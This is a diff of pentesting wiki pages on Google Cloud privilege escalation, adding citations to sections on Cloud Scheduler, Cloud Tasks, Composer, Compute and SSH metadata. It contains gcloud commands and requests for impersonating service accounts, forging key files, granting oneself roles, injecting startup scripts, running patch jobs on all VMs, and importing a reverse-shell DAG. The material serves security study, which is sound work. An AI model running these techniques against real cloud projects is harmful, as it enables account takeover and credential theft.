-jsonPayload.@type="type.googleapis.com/google.cloud.scheduler.logging.AttemptFinished"' --limit 10 --project <project-id> --format=json
+# Check the logs to confirm it worked
+gcloud logging read 'resource.type="cloud_scheduler_job" AND resource.labels.job_id="scheduler_lab_1" AND resource.labels.location="us-central1" AND jsonPayload.@type="type.googleapis.com/google.cloud.scheduler.logging.AttemptFinished"' --limit 10 --project <project-id> --format=json
 
 ## If any  '"status": 200'  it means it worked!
 ## Note that this scheduler will be executed every minute and after a key has been created, all the other attempts to submit the same key will throw a: "status": 400
@@ -101,21 +111,19 @@ private_key_json=$(jq -Rn --arg str "$file_content" '$str')
 gcloud iam service-accounts keys list --iam-account=victim@$PROJECT_ID.iam.gserviceaccount.com
 
 # Create the json in a file
-## NOTE that you need to export your project-id in the env var PROJECT_ID
 ## and that this script is expecting the key ID to be the first one (check the `head`)
-export PROJECT_ID=...
 cat > /tmp/lab.json <<EOF
 {
   "type": "service_account",
   "project_id": "$PROJECT_ID",
-  "private_key_id": "$(gcloud iam service-accounts keys list --iam-account=scheduler-lab-1-target@$PROJECT_ID.iam.gserviceaccount.com | cut -d " " -f 1 | grep -v KEY_ID | head -n 1)",
+  "private_key_id": "$(gcloud iam service-accounts keys list --iam-account=victim@$PROJECT_ID.iam.gserviceaccount.com | cut -d " " -f 1 | grep -v KEY_ID | head -n 1)",
   "private_key": $private_key_json,
-  "client_email": "scheduler-lab-1-target@$PROJECT_ID.iam.gserviceaccount.com",
-  "client_id": "$(gcloud iam service-accounts describe scheduler-lab-1-target@$PROJECT_ID.iam.gserviceaccount.com | grep oauth2ClientId | cut -d "'" -f 2)",
+  "client_email": "victim@$PROJECT_ID.iam.gserviceaccount.com",
+  "client_id": "$(gcloud iam service-accounts describe victim@$PROJECT_ID.iam.gserviceaccount.com | grep oauth2ClientId | cut -d "'" -f 2)",
   "auth_uri": "https://accounts.google.com/o/oauth2/auth",
   "token_uri": "https://oauth2.googleapis.com/token",
   "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
-  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/scheduler-lab-1-target%40$PROJECT_ID.iam.gserviceaccount.com",
+  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/victim%40$PROJECT_ID.iam.gserviceaccount.com",
   "universe_domain": "googleapis.com"
 }
 EOF
@@ -126,11 +134,20 @@ gcloud auth activate-service-account --key-file=/tmp/lab.json
 
 </details>
 
+The IAM upload method returns a service-account key on success; list the key ID, then activate the locally retained private key with `gcloud auth activate-service-account`.<sup>[[8]](#references)[[9]](#references)[[11]](#references)</sup>
+
 ## References
 
-- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [1] [Privilege Escalation in Google Cloud Platform – Part 1 (IAM) | Rhino Security Labs](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [2] [Cloud Scheduler roles and permissions | Google Cloud Documentation](https://docs.cloud.google.com/iam/docs/roles-permissions/cloudscheduler)
+- [3] [Use authentication with HTTP targets | Cloud Scheduler | Google Cloud Documentation](https://docs.cloud.google.com/scheduler/docs/http-target-auth)
+- [4] [REST Resource: projects.locations.jobs | Cloud Scheduler | Google Cloud Documentation](https://docs.cloud.google.com/scheduler/docs/reference/rest/v1/projects.locations.jobs)
+- [5] [gcloud scheduler jobs create http | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/scheduler/jobs/create/http)
+- [6] [gcloud scheduler jobs update http | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/scheduler/jobs/update/http)
+- [7] [Buckets: insert | Cloud Storage | Google Cloud Documentation](https://docs.cloud.google.com/storage/docs/json_api/v1/buckets/insert)
+- [8] [Method: projects.serviceAccounts.keys.upload | IAM | Google Cloud Documentation](https://docs.cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts.keys/upload)
+- [9] [Upload service account keys | IAM | Google Cloud Documentation](https://docs.cloud.google.com/iam/docs/keys-upload)
+- [10] [Troubleshoot Cloud Scheduler issues | Google Cloud Documentation](https://docs.cloud.google.com/scheduler/docs/troubleshooting)
+- [11] [gcloud auth activate-service-account | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/auth/activate-service-account)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md
@@ -1,12 +1,10 @@
 # GCP - Cloud Tasks Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloud Tasks
 
 ### `cloudtasks.tasks.create`, `iam.serviceAccounts.actAs`
 
-An attacker with these permissions can **impersonate other service accounts** by creating tasks that execute with the specified service account's identity. This allows sending **authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions** services.
+An attacker with these permissions can **impersonate other service accounts** by creating HTTP tasks that use the specified service account for their OIDC token. Because Cloud Tasks supports Cloud Run and Cloud Functions as HTTP targets, this allows sending **authenticated HTTP requests to IAM-protected services**.<sup>[[1]](#references)[[2]](#references)[[4]](#references)</sup>
 
 <details><summary>Create Cloud Task with service account impersonation</summary>
 
@@ -26,7 +24,7 @@ gcloud tasks create-http-task \
 
 ### `cloudtasks.tasks.run`, `cloudtasks.tasks.list`
 
-An attacker with these permissions can **run existing scheduled tasks** without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts.
+An attacker with these permissions can list tasks to identify existing task names and **run existing scheduled tasks** without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts.<sup>[[2]](#references)[[3]](#references)[[5]](#references)[[6]](#references)[[8]](#references)</sup>
 
 <details><summary>Run existing Cloud Task without actAs permission</summary>
 
@@ -36,11 +34,11 @@ gcloud tasks run projects/<project_id>/locations/us-central1/queues/<queue_name>
 
 </details>
 
-The principal executing this command **doesn't need `iam.serviceAccounts.actAs` permission** on the task's service account. However, this only allows running existing tasks - it doesn't grant the ability to create or modify tasks.
+The task-run API documents `cloudtasks.tasks.run` as the required permission, so the principal executing this command **doesn't need `iam.serviceAccounts.actAs` permission** on the task's service account. However, this only allows running existing tasks - it doesn't grant the ability to create or modify tasks.<sup>[[3]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ### `cloudtasks.queues.setIamPolicy`
 
-An attacker with this permission can **grant themselves or other principals Cloud Tasks roles** on specific queues, potentially escalating to `roles/cloudtasks.admin` which includes the ability to create and run tasks.
+An attacker with this permission can **grant themselves or other principals Cloud Tasks roles** on specific queues, potentially escalating to `roles/cloudtasks.admin`, which includes the ability to create and run tasks.<sup>[[3]](#references)[[7]](#references)</sup>
 
 <details><summary>Grant Cloud Tasks admin role on queue</summary>
 
@@ -54,10 +52,17 @@ gcloud tasks queues add-iam-policy-binding \
 
 </details>
 
-This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control.
+This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control.<sup>[[3]](#references)[[7]](#references)</sup>
 
 ## References
 
-- [Google Cloud Tasks Documentation](https://cloud.google.com/tasks/docs)
+- [1] [Google Cloud Tasks Documentation](https://cloud.google.com/tasks/docs)
+- [2] [Create Cloud Tasks tasks](https://docs.cloud.google.com/tasks/docs/create-tasks)
+- [3] [Access control with IAM](https://docs.cloud.google.com/tasks/docs/access-control)
+- [4] [gcloud tasks create-http-task](https://cloud.google.com/sdk/gcloud/reference/tasks/create-http-task)
+- [5] [gcloud tasks run](https://docs.cloud.google.com/sdk/gcloud/reference/tasks/run)
+- [6] [Method: projects.locations.queues.tasks.run](https://docs.cloud.google.com/tasks/docs/reference/rest/v2/projects.locations.queues.tasks/run)
+- [7] [gcloud tasks queues add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/tasks/queues/add-iam-policy-binding)
+- [8] [Method: projects.locations.queues.tasks.list](https://docs.cloud.google.com/tasks/docs/reference/rest/v2/projects.locations.queues.tasks/list)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Composer Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## composer
 
 More info in:
@@ -12,7 +10,7 @@ More info in:
 
 ### `composer.environments.create`
 
-It's possible to **attach any service account** to the newly create composer environment with that permission. Later you could execute code inside composer to steal the service account token.
+With `composer.environments.create` and the required `iam.serviceAccounts.actAs` check on the target account, a principal can **attach a chosen service account** to a new Composer environment. DAGs execute on behalf of the environment's service account, so code running in Composer can obtain the service-account token or other short-lived credentials exposed by that runtime and use its effective permissions; this is the privilege-escalation impact.<sup>[[1]](#references)[[2]](#references)[[13]](#references)</sup>
 
 <details><summary>Create Composer environment with attached service account</summary>
 
@@ -25,11 +23,11 @@ gcloud composer environments create privesc-test \
 
 </details>
 
-More info about the exploitation [**here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/i-composer.environmets.create.sh).
+More info about the exploitation [**here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/i-composer.environmets.create.sh).<sup>[[3]](#references)</sup>
 
 ### `composer.environments.update`
 
-It's possible to update composer environment, for example, modifying env variables:
+`composer.environments.update` can modify Composer environment variables. Google also warns that this permission provides broad control over the environment, including code execution on behalf of its service account through mechanisms such as PyPI package installation or code referenced by environment variables.<sup>[[2]](#references)[[4]](#references)</sup>
 
 <details><summary>Update Composer environment variables for code execution</summary>
 
@@ -42,7 +40,7 @@ gcloud composer environments update \
     --project <project-id>
 
 # Call the API endpoint directly
-PATCH /v1/projects/<project-id>/locations/<location>/environments/<composer-env-name>?alt=json&updateMask=config.software_config.env_variables HTTP/2
+PATCH /v1/projects/<project-id>/locations/<location>/environments/<composer-env-name>?alt=json&updateMask=config.softwareConfig.envVariables HTTP/2
 Host: composer.googleapis.com
 User-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0)
 Accept-Encoding: gzip, deflate, br
@@ -58,11 +56,17 @@ X-Allowed-Locations: 0x0
 
 </details>
 
+The direct request uses the Composer `PATCH` endpoint and an update mask for `config.softwareConfig.envVariables`; the current REST reference requires `composer.environments.update`.<sup>[[5]](#references)</sup>
+
+The `PYTHONWARNINGS`/`BROWSER` chain in the sample is the environment-variable code-execution technique documented by elttam. Its behavior depends on the Python and system utilities in the selected Composer image, so validate the payload against that image rather than assuming every version exposes the same chain.<sup>[[12]](#references)</sup>
+
 TODO: Get RCE by adding new pypi packages to the environment
+
+Google documents that installing custom PyPI packages builds Airflow component images and executes package code, so validate this TODO as a version- and permission-dependent code-execution path.<sup>[[2]](#references)</sup>
 
 ### Download Dags
 
-Check the source code of the dags being executed:
+Check the source code of the DAGs being executed; the Cloud SDK supports exporting the environment's DAG directory to local storage with this command.<sup>[[6]](#references)</sup>
 
 <details><summary>Export and download DAGs from Composer environment</summary>
 
@@ -75,7 +79,7 @@ gcloud composer environments storage dags export --environment <environment> --l
 
 ### Import Dags
 
-Add the python DAG code into a file and import it running:
+Add the Python DAG code into a file and import it; the Cloud SDK writes the source into the environment's `dags/` directory and overwrites colliding objects.<sup>[[7]](#references)</sup>
 
 <details><summary>Import malicious DAG into Composer environment</summary>
 
@@ -86,14 +90,14 @@ gcloud composer environments storage dags import --environment test --location u
 
 </details>
 
-Reverse shell DAG:
+This reverse-shell DAG uses the Airflow 2 `airflow.operators.bash` import; verify the operator arguments against the Composer image in use.<sup>[[8]](#references)[[9]](#references)</sup>
 
 <details><summary>Python DAG code for reverse shell</summary>
 
 ```python
 import airflow
 from airflow import DAG
-from airflow.operators.bash_operator import BashOperator
+from airflow.operators.bash import BashOperator
 from datetime import timedelta
 
 default_args = {
@@ -126,7 +130,9 @@ t1 = BashOperator(
 
 ### Write Access to the Composer bucket
 
-All the components of a composer environments (DAGs, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version.
+Composer associates each environment with a Cloud Storage bucket containing its DAGs, plugins, and task data. The service synchronizes these folders from the bucket into Airflow components; with read and write access, an attacker can monitor the bucket and, **whenever a DAG is created or updated, submit a backdoored version** that the environment will synchronize and execute as its service account.<sup>[[2]](#references)[[10]](#references)[[11]](#references)</sup>
+
+The original monitoring proof of concept is [**Monitor-Backdoor-Composer-DAGs**](https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs).<sup>[[11]](#references)</sup>
 
 Get more info about this attack in:
 
@@ -142,7 +148,20 @@ TODO: Check what is possible to compromise by uploading plugins
 
 TODO: Check what is possible to compromise by uploading data
 
+## References
+
+- [1] [Create Managed Service for Apache Airflow environments](https://docs.cloud.google.com/composer/docs/composer-3/create-environments)
+- [2] [Access control with IAM — Managed Service for Apache Airflow](https://docs.cloud.google.com/composer/docs/composer-3/access-control)
+- [3] [Composer environment creation privilege-escalation test](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/i-composer.environmets.create.sh)
+- [4] [gcloud composer environments update](https://docs.cloud.google.com/sdk/gcloud/reference/composer/environments/update)
+- [5] [Method: projects.locations.environments.patch](https://docs.cloud.google.com/composer/docs/reference/rest/v1/projects.locations.environments/patch)
+- [6] [gcloud composer environments storage dags export](https://docs.cloud.google.com/sdk/gcloud/reference/composer/environments/storage/dags/export)
+- [7] [gcloud composer environments storage dags import](https://docs.cloud.google.com/sdk/gcloud/reference/composer/environments/storage/dags/import)
+- [8] [BashOperator — Airflow 2.11.1 Documentation](https://airflow.apache.org/docs/apache-airflow/2.11.1/howto/operator/bash.html)
+- [9] [airflow.operators.bash_operator — Airflow 1.10.15 Documentation](https://airflow.apache.org/docs/apache-airflow/1.10.15/_api/airflow/operators/bash_operator/index.html)
+- [10] [Data stored in Cloud Storage — Managed Service for Apache Airflow](https://docs.cloud.google.com/composer/docs/composer-3/cloud-storage)
+- [11] [Monitor-Backdoor-Composer-DAGs](https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs)
+- [12] [Hacking with Environment Variables](https://www.elttam.com/blog/env)
+- [13] [Service account credentials](https://docs.cloud.google.com/iam/docs/service-account-creds)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
@@ -59,19 +59,16 @@ EOF
 gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE
 ```
 
+> [!TIP]
+> Both OS Login paths below also require `iam.serviceAccounts.actAs` on the service account attached to the VM.<sup>[[12]](#references)[[27]](#references)</sup>
+
 ### **`compute.instances.osLogin`**
 
 If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
-> [!TIP]
-> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.<sup>[[12]](#references)[[27]](#references)</sup>
-
 ### **`compute.instances.osAdminLogin`**
 
-If **OSLogin is enabled in the instanc**e, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
-
-> [!TIP]
-> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.<sup>[[12]](#references)[[27]](#references)</sup>
+If **OS Login is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ### `compute.instances.create`,`iam.serviceAccounts.actAs, compute.disks.create`, `compute.instances.create`, `compute.instances.setMetadata`, `compute.instances.setServiceAccount`, `compute.subnetworks.use`, `compute.subnetworks.useExternalIp`
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
@@ -1,7 +1,5 @@
 # GCP - Compute Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Compute
 
 For more information about Compute and VPC (netowork) in GCP check:
@@ -11,14 +9,14 @@ For more information about Compute and VPC (netowork) in GCP check:
 {{#endref}}
 
 > [!CAUTION]
-> Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached!
+> Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached!<sup>[[2]](#references)[[27]](#references)</sup>
 
 ### `compute.projects.setCommonInstanceMetadata`
 
-With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
+With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.<sup>[[3]](#references)[[5]](#references)[[10]](#references)</sup>\
 Limitations:
 
-- Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
+- Note that GCP Service Accounts running in VM instances by default have a **very limited scope**<sup>[[5]](#references)</sup>
 - You will need to be **able to contact the SSH** server to login
 
 For more information about how to exploit this permission check:
@@ -27,7 +25,7 @@ For more information about how to exploit this permission check:
 gcp-add-custom-ssh-metadata.md
 {{#endref}}
 
-You could aslo perform this attack by adding new startup-script and rebooting the instance:
+You could aslo perform this attack by adding new startup-script and rebooting the instance:<sup>[[4]](#references)</sup>
 
 ```bash
 gcloud compute instances add-metadata my-vm-instance \
@@ -39,11 +37,11 @@ gcloud compute instances reset my-vm-instance
 
 ### `compute.instances.setMetadata`
 
-This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations as for the previous section applies**.
+This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations as for the previous section applies**.<sup>[[6]](#references)[[10]](#references)</sup>
 
 ### `compute.instances.setIamPolicy`
 
-This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. Here is an example adding `roles/compute.admin` to a Service Account:
+This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. Here is an example adding `roles/compute.admin` to a Service Account:<sup>[[7]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 export SERVER_SERVICE_ACCOUNT=YOUR_SA
@@ -63,32 +61,32 @@ gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE
 
 ### **`compute.instances.osLogin`**
 
-If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance.
+If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 > [!TIP]
-> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.
+> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.<sup>[[12]](#references)[[27]](#references)</sup>
 
 ### **`compute.instances.osAdminLogin`**
 
-If **OSLogin is enabled in the instanc**e, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance.
+If **OSLogin is enabled in the instanc**e, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 > [!TIP]
-> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.
+> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.<sup>[[12]](#references)[[27]](#references)</sup>
 
 ### `compute.instances.create`,`iam.serviceAccounts.actAs, compute.disks.create`, `compute.instances.create`, `compute.instances.setMetadata`, `compute.instances.setServiceAccount`, `compute.subnetworks.use`, `compute.subnetworks.useExternalIp`
 
-It's possible to **create a virtual machine with an assigned Service Account and steal the token** of the service account accessing the metadata to escalate privileges to it.
+It's possible to **create a virtual machine with an assigned Service Account and steal the token** of the service account accessing the metadata to escalate privileges to it.<sup>[[1]](#references)[[14]](#references)[[15]](#references)</sup>
 
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py).
+The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py).<sup>[[1]](#references)[[14]](#references)</sup>
 
 ### `osconfig.patchDeployments.create` | `osconfig.patchJobs.exec`
 
-If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project.
+If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project.<sup>[[16]](#references)[[17]](#references)[[18]](#references)[[20]](#references)</sup>
 
-Note that at the moment you **don't need `actAs` permission** over the SA attached to the instance.
+Note that at the moment you **don't need `actAs` permission** over the SA attached to the instance.<sup>[[16]](#references)[[17]](#references)</sup>
 
-If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)**.**\
-For a patch job run:
+If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)**.**<sup>[[18]](#references)[[19]](#references)[[22]](#references)[[23]](#references)</sup>\
+For a patch job run:<sup>[[17]](#references)[[18]](#references)[[20]](#references)</sup>
 
 ```python
 cat > /tmp/patch-job.sh <<EOF
@@ -109,27 +107,27 @@ gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \
   --duration=300s
 ```
 
-To deploy a patch deployment:
+To deploy a patch deployment:<sup>[[19]](#references)[[20]](#references)</sup>
 
 ```bash
 gcloud compute os-config patch-deployments create <name> ...
 ```
 
-The tool [patchy](https://github.com/rek7/patchy) could been used in the past for exploiting this misconfiguration (but now it's not working).
+The tool [patchy](https://github.com/rek7/patchy) could been used in the past for exploiting this misconfiguration (but now it's not working).<sup>[[21]](#references)</sup>
 
-**An attacker could also abuse this for persistence.**
+**An attacker could also abuse this for persistence.**<sup>[[20]](#references)[[21]](#references)</sup>
 
 ### `compute.machineImages.setIamPolicy`
 
-**Grant yourself extra permissions** to compute Image.
+**Grant yourself extra permissions** to compute Image.<sup>[[24]](#references)</sup>
 
 ### `compute.snapshots.setIamPolicy`
 
-**Grant yourself extra permissions** to a disk snapshot.
+**Grant yourself extra permissions** to a disk snapshot.<sup>[[25]](#references)</sup>
 
 ### `compute.disks.setIamPolicy`
 
-**Grant yourself extra permissions** to a disk.
+**Grant yourself extra permissions** to a disk.<sup>[[26]](#references)</sup>
 
 ### Bypass Access Scopes
 
@@ -143,9 +141,32 @@ Following this link you find some [**ideas to try to bypass access scopes**](../
 
 ## References
 
-- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [1] [Privilege Escalation in Google Cloud Platform – Part 1 (IAM)](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [2] [Method: projects.setCommonInstanceMetadata](https://docs.cloud.google.com/compute/docs/reference/rest/v1/projects/setCommonInstanceMetadata)
+- [3] [Add SSH keys to VMs](https://docs.cloud.google.com/compute/docs/connect/add-ssh-keys)
+- [4] [Use startup scripts on Linux VMs](https://docs.cloud.google.com/compute/docs/instances/startup-scripts/linux)
+- [5] [Service accounts](https://docs.cloud.google.com/compute/docs/access/service-accounts)
+- [6] [Method: instances.setMetadata](https://docs.cloud.google.com/compute/docs/reference/rest/v1/instances/setMetadata)
+- [7] [Method: instances.setIamPolicy](https://docs.cloud.google.com/compute/docs/reference/rest/v1/instances/setIamPolicy)
+- [8] [Compute Engine roles and permissions](https://docs.cloud.google.com/compute/docs/access/iam)
+- [9] [gcloud compute instances set-iam-policy](https://docs.cloud.google.com/sdk/gcloud/reference/compute/instances/set-iam-policy)
+- [10] [Google Cloud privilege escalation & post-exploitation tactics](https://about.gitlab.com/blog/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [11] [About OS Login](https://docs.cloud.google.com/compute/docs/oslogin)
+- [12] [Set up OS Login](https://docs.cloud.google.com/compute/docs/oslogin/set-up-oslogin)
+- [13] [gcloud compute ssh](https://docs.cloud.google.com/sdk/gcloud/reference/compute/ssh)
+- [14] [compute.instances.create.py](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py)
+- [15] [Method: instances.insert](https://docs.cloud.google.com/compute/docs/reference/rest/v1/instances/insert)
+- [16] [Cloud OS Config roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/osconfig)
+- [17] [Method: projects.patchJobs.execute](https://docs.cloud.google.com/compute/docs/osconfig/rest/v1/projects.patchJobs/execute)
+- [18] [Create patch jobs](https://docs.cloud.google.com/compute/vm-manager/docs/patch/create-patch-job)
+- [19] [gcloud compute os-config patch-deployments create](https://docs.cloud.google.com/sdk/gcloud/reference/compute/os-config/patch-deployments/create)
+- [20] [Abusing OS Patch Management in GCP for Lateral Movement and Persistence](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching)
+- [21] [rek7/patchy](https://github.com/rek7/patchy)
+- [22] [patchy patch_job.json](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json)
+- [23] [patchy patch_deployment.json](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)
+- [24] [REST Resource: machineImages](https://docs.cloud.google.com/compute/docs/reference/rest/v1/machineImages)
+- [25] [REST Resource: snapshots](https://docs.cloud.google.com/compute/docs/reference/rest/v1/snapshots)
+- [26] [REST Resource: disks](https://docs.cloud.google.com/compute/docs/reference/rest/v1/disks)
+- [27] [Roles for service account authentication](https://docs.cloud.google.com/iam/docs/service-account-permissions)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
@@ -1,44 +1,45 @@
 # GCP - Add Custom SSH Metadata
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>
 
 Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**.
+The permissions commonly relevant to this path are `compute.instances.setMetadata` for one VM and `compute.projects.setCommonInstanceMetadata` for project-wide metadata. <sup>[[1]](#references)[[4]](#references)</sup>
 
 ### **Incorporation of SSH Keys into Custom Metadata**
 
-On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**.
+On older GCP Linux images, the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) included the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). That package is now superseded by `google-guest-agent`, whose [current documentation](https://docs.cloud.google.com/compute/docs/images/guest-agent-functions) describes the same metadata-based account and SSH-key management when OS Login is disabled. <sup>[[2]](#references)[[3]](#references)</sup>
 
-Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host.
+When metadata-based SSH-key management is active, the guest agent watches instance or project metadata for authorized-key changes. A new key can update an existing managed user's `~/.ssh/authorized_keys` or provision a new user in the `google-sudoers` group, depending on the key format. <sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+
